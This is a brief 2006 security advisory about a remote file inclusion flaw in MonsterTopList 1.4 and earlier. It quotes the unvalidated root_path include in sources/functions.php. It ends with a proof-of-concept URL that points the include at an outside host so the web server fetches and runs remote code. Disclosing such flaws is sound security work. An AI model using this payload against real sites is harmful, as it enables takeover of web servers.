MonsterTopList- Remote Code Execution bug

discovered By: VietMafia

Developer site: http://www.monstertoplist.com/
Software: MTL 1.4 and prior
Risk: Moderate
Status: unpatched
orginal advisory:http://pridels.blogspot.com/2006/04/monstertoplist.html

=================================

This flaw is due to an input validation error in the
"sources/functions.php"(line 8)
script that does not validate the "$root_path" variable,remote
attackers can include
malicious scripts and execute arbitrary commands with the privileges
of the web server

code:file sources/functions.php

line 8: require $root_path . "sources/func_output.php";

demo:

http://www.monstertoplist.com/demo.html

POC Exploit http://[target]/[path]/sources/functions.php?root_path=http://unsecured-systems.com/forum/